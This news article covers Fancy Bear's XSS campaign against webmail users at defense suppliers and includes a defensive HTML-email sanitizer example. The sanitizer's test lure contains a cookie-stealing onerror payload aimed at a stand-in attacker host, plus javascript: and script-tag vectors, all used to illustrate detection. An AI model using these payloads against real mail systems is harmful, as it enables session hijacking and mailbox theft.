Fancy Bear attacks suppliers of Soviet-era weapons through vulnerable webmail software
The notorious Russian hacking group Fancy Bear, also tracked as APT28, Sednit, or Strontium, has carried out targeted cyberattacks against defense contractors supplying weapons to Ukraine. This is according to a recent analysis by the Slovak IT security firm ESET. The attacks specifically targeted manufacturers of Soviet-era military equipment in Ukraine, Bulgaria, and Romania. Companies in Africa and South America were also targeted.
Fancy Bear has been known for years for its large-scale espionage campaigns and is believed to be a tool of Russian intelligence services. Among other things, the group was responsible for the 2015 attack on the German Bundestag, the 2016 intrusions into the Democratic Party and Hillary Clinton's presidential campaign, and the 2023 attack on the German Social Democratic Party (SPD) headquarters. Its goals: to steal information, spread disinformation, and promote geopolitical destabilization.
Target: Outdated webmail systems
As part of the campaign, which ESET calls "Operation RoundPress," the group exploited known cross-site scripting (XSS) vulnerabilities in popular webmail clients, including Roundcube, Horde, Zimbra, and MDaemon. In most cases, regularly applied security updates would have closed these gaps. In at least one case, however, a previously unknown XSS vulnerability in MDaemon Email Server (CVE-2024-11182) was exploited as a zero-day, for which no patch was available at the time.
The attacks were typically delivered as emails disguised as legitimate news reports, purporting to come from well-known media outlets such as the Kyiv Post or News.bg. The payload was JavaScript hidden in the HTML body of the message: as soon as the recipient opened the email in the webmail client, the browser executed it in the context of the logged-in webmail session, without the user clicking a link or opening an attachment. The messages passed the targets' spam filters.
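The mechanism described above is stored XSS: the webmail client rendered attacker-controlled HTML with its script-bearing parts intact. The following is an added example, not code from ESET or from any of the webmail products named in this article. It is a small allowlist sanitizer for HTML mail bodies written for Node.js with no dependencies, run against a constructed lure modelled on the report's description (the `example.com` and `attacker.invalid` hosts, the payload, and the tag and attribute allowlists are all assumptions made for the illustration). It shows what a webmail renderer must strip before an untrusted message reaches the browser, and which stripped items a mail gateway could log as a detection signal.

```javascript
// Added example (not ESET's or any vendor's code): allowlist sanitizer for
// HTML email bodies. Production systems should use a maintained DOM-based
// sanitizer such as DOMPurify; this toy only makes the failure mode concrete.

// Assumed allowlists: tags and attributes a mail client needs to show a
// news-style message. Everything else, in particular on* handlers, style
// and srcset, is dropped.
const ALLOWED_TAGS = new Set([
  "p", "br", "div", "span", "b", "i", "em", "strong", "u", "h1", "h2", "h3",
  "ul", "ol", "li", "blockquote", "a", "img", "table", "tr", "td", "th",
]);
const ALLOWED_ATTRS = new Set(["href", "src", "alt", "title"]);
// Elements whose entire body is discarded, not just the tag itself.
const DROP_WITH_BODY = new Set([
  "script", "style", "iframe", "object", "embed", "svg", "math", "template", "noscript",
]);
const VOID_TAGS = new Set(["br", "img"]);

const TAG_RE = /^<(\/?)([a-zA-Z][\w-]*)([\s\S]*?)\/?>$/;
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Decode numeric entities and remove control characters and whitespace so
// that "java&#115;cript:" or "java\tscript:" cannot slip past the scheme check.
function normalizeUrl(raw) {
  return raw
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/[\u0000-\u0020]/g, "")
    .toLowerCase();
}

// Relative URLs (no scheme) are fine; otherwise only http(s), mailto and cid
// (inline attachments) are allowed.
function isSafeUrl(raw) {
  const u = normalizeUrl(raw);
  return !u.includes(":") || /^(https?|mailto|cid):/.test(u);
}

function sanitizeAttrs(tagName, rawAttrs, removed) {
  let out = "";
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    if (!ALLOWED_ATTRS.has(name)) { removed.push(`${tagName}@${name}`); continue; }
    if ((name === "href" || name === "src") && !isSafeUrl(value)) {
      removed.push(`${tagName}@${name}=${value}`);
      continue;
    }
    out += ` ${name}="${value.replace(/"/g, "&quot;")}"`;
  }
  return out;
}

// Returns the cleaned HTML plus a list of what was stripped; the latter is
// worth logging, since a "news article" carrying onerror handlers is a signal.
function sanitizeEmailHtml(html) {
  const removed = [];
  let out = "";
  let skipUntil = null; // name of the element whose body is being discarded
  for (const tok of html.split(/(<[^>]*>)/)) {
    if (tok === "") continue;
    if (tok[0] !== "<") {
      // Text node: neutralize any stray "<" the tag regex did not consume,
      // so the browser can only see tags this function emitted.
      if (skipUntil === null) out += tok.replace(/</g, "&lt;");
      continue;
    }
    const m = TAG_RE.exec(tok);
    if (!m) { removed.push(tok.slice(0, 20)); continue; } // comments, <!DOCTYPE>, junk
    const [, close, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    if (skipUntil !== null) {
      if (close && name === skipUntil) skipUntil = null;
      continue;
    }
    if (DROP_WITH_BODY.has(name)) {
      removed.push(`<${name}>`);
      if (!close) skipUntil = name;
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) { removed.push(`<${name}>`); continue; }
    if (close) { if (!VOID_TAGS.has(name)) out += `</${name}>`; continue; }
    out += `<${name}${sanitizeAttrs(name, rawAttrs, removed)}>`;
  }
  return { html: out, removed };
}

// Constructed sample (not a real RoundPress message): a fake news item whose
// <img onerror> fires as soon as the HTML is rendered, with no click needed.
const LURE = `<h1>Kyiv Post: SBU Detains Suspects</h1>
<p>Read more at <a href="https://example.com/story">our site</a>.</p>
<img src="x" onerror="fetch('https://attacker.invalid/c?d='+document.cookie)">
<a href="java&#115;cript:alert(1)">Click</a>
<script>/* would read the mailbox via the webmail API here */</script>
<svg><script>alert(2)</script></svg>`;

const result = sanitizeEmailHtml(LURE);
console.log(result.html);
console.log("stripped:", result.removed);
```

The cleaned output keeps the headline, paragraph, link and image, but the `onerror` handler, the entity-encoded `javascript:` link, the `<script>` element and the `<svg>` subtree are gone, and `removed` records each of them. A renderer hardened this way also benefits from a Content-Security-Policy that forbids inline scripts, so that anything a sanitizer misses still fails to run.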
2FA bypassed: Malware in action
ESET researchers call the malware family SpyPress; the variant aimed at MDaemon is named "SpyPress.MDAEMON." It is JavaScript that runs inside the victim's webmail session and is capable of comprehensively compromising the account, including stealing login credentials and reading messages. Particularly alarming: in several cases, two-factor authentication (2FA) was also successfully bypassed. The malware created so-called application passwords, per-client credentials that the mail server accepts without a second factor, which gave the attackers long-term access to the mailboxes even after the webmail session ended.
“Many companies run their webmail systems on outdated software,” warns Matthieu Faou of ESET. “Often, simply opening a malicious email in a browser—without even clicking on it—is enough for malicious code to be executed.”
Conclusion
This case once again highlights the importance of regular security updates, up-to-date patch management, and hardening of email systems, in particular the webmail front ends that render untrusted HTML, especially for companies in security-critical sectors. Outdated infrastructure is an open gateway for state-sponsored cyber actors such as Fancy Bear.